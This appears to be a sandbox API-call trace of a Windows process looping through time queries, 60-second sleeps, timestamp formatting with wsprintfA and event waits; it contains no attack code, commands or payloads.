	[0247.947] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7b7e4e80, dwHighDateTime=0x1d50a6a)) 
	[0247.947] Sleep (dwMilliseconds=0xea60) 
	[0247.963] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7b80afe0, dwHighDateTime=0x1d50a6a)) 
	[0247.963] Sleep (dwMilliseconds=0xea60) 
	[0247.978] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7b831140, dwHighDateTime=0x1d50a6a)) 
	[0247.978] Sleep (dwMilliseconds=0xea60) 
	[0247.994] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7b8572a0, dwHighDateTime=0x1d50a6a)) 
	[0247.994] Sleep (dwMilliseconds=0xea60) 
	[0248.010] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7b87d400, dwHighDateTime=0x1d50a6a)) 
	[0248.010] wsprintfA (in: param_1=0xf8fe60, param_2="%ld\r\n" | out: param_1="1557908262\r\n") returned 12
	[0248.010] ResetEvent (hEvent=0xc) returned 1
	[0248.010] WaitForSingleObject (hHandle=0xc, dwMilliseconds=0xffffffff) returned 0x0
	[0248.059] Sleep (dwMilliseconds=0xea60) 
	[0248.072] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7b915980, dwHighDateTime=0x1d50a6a)) 
	[0248.072] Sleep (dwMilliseconds=0xea60) 
	[0248.119] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7b987da0, dwHighDateTime=0x1d50a6a)) 
	[0248.119] Sleep (dwMilliseconds=0xea60) 
	[0248.134] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7b9adf00, dwHighDateTime=0x1d50a6a)) 
	[0248.134] Sleep (dwMilliseconds=0xea60) 
	[0248.150] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7b9d4060, dwHighDateTime=0x1d50a6a)) 
	[0248.150] Sleep (dwMilliseconds=0xea60) 
	[0248.166] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7b9fa1c0, dwHighDateTime=0x1d50a6a)) 
	[0248.166] Sleep (dwMilliseconds=0xea60) 
	[0248.189] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7ba20320, dwHighDateTime=0x1d50a6a)) 
	[0248.189] Sleep (dwMilliseconds=0xea60) 
	[0248.196] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7ba46480, dwHighDateTime=0x1d50a6a)) 
	[0248.196] Sleep (dwMilliseconds=0xea60) 
	[0248.212] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7ba6c5e0, dwHighDateTime=0x1d50a6a)) 
	[0248.212] Sleep (dwMilliseconds=0xea60) 
	[0248.228] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7ba92740, dwHighDateTime=0x1d50a6a)) 
	[0248.228] Sleep (dwMilliseconds=0xea60) 
	[0248.243] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7bab88a0, dwHighDateTime=0x1d50a6a)) 
	[0248.243] Sleep (dwMilliseconds=0xea60) 
	[0248.259] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7badea00, dwHighDateTime=0x1d50a6a)) 
	[0248.259] Sleep (dwMilliseconds=0xea60) 
	[0248.277] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7bb04b60, dwHighDateTime=0x1d50a6a)) 
	[0248.277] Sleep (dwMilliseconds=0xea60) 
	[0248.290] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7bb2acc0, dwHighDateTime=0x1d50a6a)) 
	[0248.290] Sleep (dwMilliseconds=0xea60) 
	[0248.306] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7bb50e20, dwHighDateTime=0x1d50a6a)) 
	[0248.306] Sleep (dwMilliseconds=0xea60) 
	[0248.323] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7bb76f80, dwHighDateTime=0x1d50a6a)) 
	[0248.323] Sleep (dwMilliseconds=0xea60) 
	[0248.338] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7bb9d0e0, dwHighDateTime=0x1d50a6a)) 
	[0248.338] Sleep (dwMilliseconds=0xea60) 
	[0248.353] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7bbc3240, dwHighDateTime=0x1d50a6a)) 
	[0248.353] Sleep (dwMilliseconds=0xea60) 
	[0248.368] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7bbe93a0, dwHighDateTime=0x1d50a6a)) 
	[0248.368] Sleep (dwMilliseconds=0xea60) 
	[0248.384] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7bc0f500, dwHighDateTime=0x1d50a6a)) 
	[0248.384] Sleep (dwMilliseconds=0xea60) 
	[0248.400] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7bc35660, dwHighDateTime=0x1d50a6a)) 
	[0248.400] Sleep (dwMilliseconds=0xea60) 
	[0248.415] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7bc5b7c0, dwHighDateTime=0x1d50a6a)) 
	[0248.415] Sleep (dwMilliseconds=0xea60) 
	[0248.430] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7bc81920, dwHighDateTime=0x1d50a6a)) 
	[0248.431] Sleep (dwMilliseconds=0xea60) 
	[0248.446] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7bca7a80, dwHighDateTime=0x1d50a6a)) 
	[0248.446] Sleep (dwMilliseconds=0xea60) 
	[0248.462] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7bccdbe0, dwHighDateTime=0x1d50a6a)) 
	[0248.462] Sleep (dwMilliseconds=0xea60) 
	[0248.477] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7bcf3d40, dwHighDateTime=0x1d50a6a)) 
	[0248.477] Sleep (dwMilliseconds=0xea60) 
	[0248.493] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7bd19ea0, dwHighDateTime=0x1d50a6a)) 
	[0248.493] Sleep (dwMilliseconds=0xea60) 
	[0248.509] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7bd40000, dwHighDateTime=0x1d50a6a)) 
	[0248.509] Sleep (dwMilliseconds=0xea60) 
	[0248.536] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7bd66160, dwHighDateTime=0x1d50a6a)) 
	[0248.536] Sleep (dwMilliseconds=0xea60) 
	[0248.541] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7bd8c2c0, dwHighDateTime=0x1d50a6a)) 
	[0248.541] Sleep (dwMilliseconds=0xea60) 
	[0248.556] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7bdb2420, dwHighDateTime=0x1d50a6a)) 
	[0248.556] Sleep (dwMilliseconds=0xea60) 
	[0248.571] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7bdd8580, dwHighDateTime=0x1d50a6a)) 
	[0248.572] wsprintfA (in: param_1=0xf8fe60, param_2="%ld\r\n" | out: param_1="1557910122\r\n") returned 12
	[0248.572] ResetEvent (hEvent=0xc) returned 1
	[0248.572] WaitForSingleObject (hHandle=0xc, dwMilliseconds=0xffffffff) returned 0x0
	[0250.585] Sleep (dwMilliseconds=0xea60) 
	[0250.606] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7cfb2a80, dwHighDateTime=0x1d50a6a)) 
	[0250.606] Sleep (dwMilliseconds=0xea60) 
	[0250.615] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7cfd8be0, dwHighDateTime=0x1d50a6a)) 
	[0250.615] Sleep (dwMilliseconds=0xea60) 
	[0250.630] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7cffed40, dwHighDateTime=0x1d50a6a)) 
	[0250.630] Sleep (dwMilliseconds=0xea60) 
	[0250.646] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7d024ea0, dwHighDateTime=0x1d50a6a)) 
	[0250.646] Sleep (dwMilliseconds=0xea60) 
	[0250.661] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7d04b000, dwHighDateTime=0x1d50a6a)) 
	[0250.661] Sleep (dwMilliseconds=0xea60) 
	[0250.677] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7d071160, dwHighDateTime=0x1d50a6a)) 
	[0250.677] Sleep (dwMilliseconds=0xea60) 
	[0250.693] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7d0972c0, dwHighDateTime=0x1d50a6a)) 
	[0250.693] Sleep (dwMilliseconds=0xea60) 
	[0250.708] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7d0bd420, dwHighDateTime=0x1d50a6a)) 
	[0250.708] Sleep (dwMilliseconds=0xea60) 
	[0250.724] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7d0e3580, dwHighDateTime=0x1d50a6a)) 
	[0250.724] Sleep (dwMilliseconds=0xea60) 
	[0250.739] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7d1096e0, dwHighDateTime=0x1d50a6a)) 
	[0250.739] Sleep (dwMilliseconds=0xea60) 
	[0250.756] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7d12f840, dwHighDateTime=0x1d50a6a)) 
	[0250.756] Sleep (dwMilliseconds=0xea60) 
	[0250.771] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7d1559a0, dwHighDateTime=0x1d50a6a)) 
	[0250.771] Sleep (dwMilliseconds=0xea60) 
	[0250.786] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7d17bb00, dwHighDateTime=0x1d50a6a)) 
	[0250.786] Sleep (dwMilliseconds=0xea60) 
	[0250.802] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7d1a1c60, dwHighDateTime=0x1d50a6a)) 
	[0250.802] Sleep (dwMilliseconds=0xea60) 
	[0250.818] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7d1c7dc0, dwHighDateTime=0x1d50a6a)) 
	[0250.818] Sleep (dwMilliseconds=0xea60) 
	[0250.833] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7d1edf20, dwHighDateTime=0x1d50a6a)) 
	[0250.833] Sleep (dwMilliseconds=0xea60) 
	[0250.848] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7d214080, dwHighDateTime=0x1d50a6a)) 
	[0250.849] Sleep (dwMilliseconds=0xea60) 
	[0250.864] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7d23a1e0, dwHighDateTime=0x1d50a6a)) 
	[0250.864] Sleep (dwMilliseconds=0xea60) 
	[0250.880] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7d260340, dwHighDateTime=0x1d50a6a)) 
	[0250.880] Sleep (dwMilliseconds=0xea60) 
	[0250.895] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7d2864a0, dwHighDateTime=0x1d50a6a)) 
	[0250.895] Sleep (dwMilliseconds=0xea60) 
	[0250.911] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7d2ac600, dwHighDateTime=0x1d50a6a)) 
	[0250.911] Sleep (dwMilliseconds=0xea60) 
	[0250.926] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7d2d2760, dwHighDateTime=0x1d50a6a)) 
	[0250.926] Sleep (dwMilliseconds=0xea60) 
	[0250.942] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7d2f88c0, dwHighDateTime=0x1d50a6a)) 
	[0250.942] Sleep (dwMilliseconds=0xea60) 
	[0250.958] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7d31ea20, dwHighDateTime=0x1d50a6a)) 
	[0250.958] Sleep (dwMilliseconds=0xea60) 
	[0250.975] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7d344b80, dwHighDateTime=0x1d50a6a)) 
	[0250.975] Sleep (dwMilliseconds=0xea60) 
	[0250.989] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7d36ace0, dwHighDateTime=0x1d50a6a)) 
	[0250.989] Sleep (dwMilliseconds=0xea60) 
	[0251.005] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7d390e40, dwHighDateTime=0x1d50a6a)) 
	[0251.005] Sleep (dwMilliseconds=0xea60) 
	[0251.020] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7d3b6fa0, dwHighDateTime=0x1d50a6a)) 
	[0251.020] Sleep (dwMilliseconds=0xea60) 
	[0251.036] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7d3dd100, dwHighDateTime=0x1d50a6a)) 
	[0251.036] Sleep (dwMilliseconds=0xea60) 
	[0251.052] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7d403260, dwHighDateTime=0x1d50a6a)) 
	[0251.052] wsprintfA (in: param_1=0xf8fe60, param_2="%ld\r\n" | out: param_1="1557911925\r\n") returned 12
	[0251.052] ResetEvent (hEvent=0xc) returned 1
	[0251.052] WaitForSingleObject (hHandle=0xc, dwMilliseconds=0xffffffff) returned 0x0
	[0253.595] Sleep (dwMilliseconds=0xea60) 
	[0253.610] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7ec693e0, dwHighDateTime=0x1d50a6a)) 
	[0253.610] Sleep (dwMilliseconds=0xea60) 
	[0253.625] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7ec8f540, dwHighDateTime=0x1d50a6a)) 
	[0253.625] Sleep (dwMilliseconds=0xea60) 
	[0253.641] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7ecb56a0, dwHighDateTime=0x1d50a6a)) 
	[0253.641] Sleep (dwMilliseconds=0xea60) 
	[0253.676] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7ed01960, dwHighDateTime=0x1d50a6a)) 
	[0253.676] Sleep (dwMilliseconds=0xea60) 
	[0253.688] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7ed27ac0, dwHighDateTime=0x1d50a6a)) 
	[0253.688] Sleep (dwMilliseconds=0xea60) 
	[0253.703] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7ed4dc20, dwHighDateTime=0x1d50a6a)) 
	[0253.703] Sleep (dwMilliseconds=0xea60) 
	[0253.719] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7ed73d80, dwHighDateTime=0x1d50a6a)) 
	[0253.719] Sleep (dwMilliseconds=0xea60) 
	[0253.735] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7ed99ee0, dwHighDateTime=0x1d50a6a)) 
	[0253.735] Sleep (dwMilliseconds=0xea60) 
	[0253.750] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7edc0040, dwHighDateTime=0x1d50a6a)) 
	[0253.750] Sleep (dwMilliseconds=0xea60) 
	[0253.766] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7ede61a0, dwHighDateTime=0x1d50a6a)) 
	[0253.766] Sleep (dwMilliseconds=0xea60) 
	[0253.782] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7ee0c300, dwHighDateTime=0x1d50a6a)) 
	[0253.782] Sleep (dwMilliseconds=0xea60) 
	[0253.797] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7ee32460, dwHighDateTime=0x1d50a6a)) 
	[0253.797] Sleep (dwMilliseconds=0xea60) 
	[0253.813] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7ee585c0, dwHighDateTime=0x1d50a6a)) 
	[0253.813] Sleep (dwMilliseconds=0xea60) 
	[0253.828] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7ee7e720, dwHighDateTime=0x1d50a6a)) 
	[0253.828] Sleep (dwMilliseconds=0xea60) 
	[0253.844] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7eea4880, dwHighDateTime=0x1d50a6a)) 
	[0253.844] Sleep (dwMilliseconds=0xea60) 
	[0253.859] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7eeca9e0, dwHighDateTime=0x1d50a6a)) 
	[0253.859] Sleep (dwMilliseconds=0xea60) 
	[0253.875] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7eef0b40, dwHighDateTime=0x1d50a6a)) 
	[0253.875] Sleep (dwMilliseconds=0xea60) 
	[0253.891] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7ef16ca0, dwHighDateTime=0x1d50a6a)) 
	[0253.891] Sleep (dwMilliseconds=0xea60) 
	[0253.906] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7ef3ce00, dwHighDateTime=0x1d50a6a)) 
	[0253.906] Sleep (dwMilliseconds=0xea60) 
	[0253.922] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7ef62f60, dwHighDateTime=0x1d50a6a)) 
	[0253.922] Sleep (dwMilliseconds=0xea60) 
	[0253.937] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7ef890c0, dwHighDateTime=0x1d50a6a)) 
	[0253.937] Sleep (dwMilliseconds=0xea60) 
	[0253.953] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7efaf220, dwHighDateTime=0x1d50a6a)) 
	[0253.953] Sleep (dwMilliseconds=0xea60) 
	[0253.968] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7efd5380, dwHighDateTime=0x1d50a6a)) 
	[0253.969] Sleep (dwMilliseconds=0xea60) 
	[0253.984] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7effb4e0, dwHighDateTime=0x1d50a6a)) 
	[0253.984] Sleep (dwMilliseconds=0xea60) 
	[0254.000] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7f021640, dwHighDateTime=0x1d50a6a)) 
	[0254.000] Sleep (dwMilliseconds=0xea60) 
	[0254.016] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7f0477a0, dwHighDateTime=0x1d50a6a)) 
	[0254.016] Sleep (dwMilliseconds=0xea60) 
	[0254.032] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7f06d900, dwHighDateTime=0x1d50a6a)) 
	[0254.032] Sleep (dwMilliseconds=0xea60) 
	[0254.047] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7f093a60, dwHighDateTime=0x1d50a6a)) 
	[0254.047] Sleep (dwMilliseconds=0xea60) 
	[0254.062] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7f0b9bc0, dwHighDateTime=0x1d50a6a)) 
	[0254.062] Sleep (dwMilliseconds=0xea60) 
	[0254.078] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7f0dfd20, dwHighDateTime=0x1d50a6a)) 
	[0254.078] wsprintfA (in: param_1=0xf8fe60, param_2="%ld\r\n" | out: param_1="1557913728\r\n") returned 12
	[0254.078] ResetEvent (hEvent=0xc) returned 1
	[0254.078] WaitForSingleObject (hHandle=0xc, dwMilliseconds=0xffffffff) returned 0x0
	[0256.606] Sleep (dwMilliseconds=0xea60) 
	[0256.621] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x8091fd40, dwHighDateTime=0x1d50a6a)) 
	[0256.621] Sleep (dwMilliseconds=0xea60) 
	[0256.636] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x80945ea0, dwHighDateTime=0x1d50a6a)) 
	[0256.636] Sleep (dwMilliseconds=0xea60) 
	[0256.652] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x8096c000, dwHighDateTime=0x1d50a6a)) 
	[0256.652] Sleep (dwMilliseconds=0xea60) 
	[0256.710] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x809de420, dwHighDateTime=0x1d50a6a)) 
	[0256.710] Sleep (dwMilliseconds=0xea60) 
	[0256.714] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x80a04580, dwHighDateTime=0x1d50a6a)) 
	[0256.714] Sleep (dwMilliseconds=0xea60) 
	[0256.730] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x80a2a6e0, dwHighDateTime=0x1d50a6a)) 
	[0256.730] Sleep (dwMilliseconds=0xea60) 
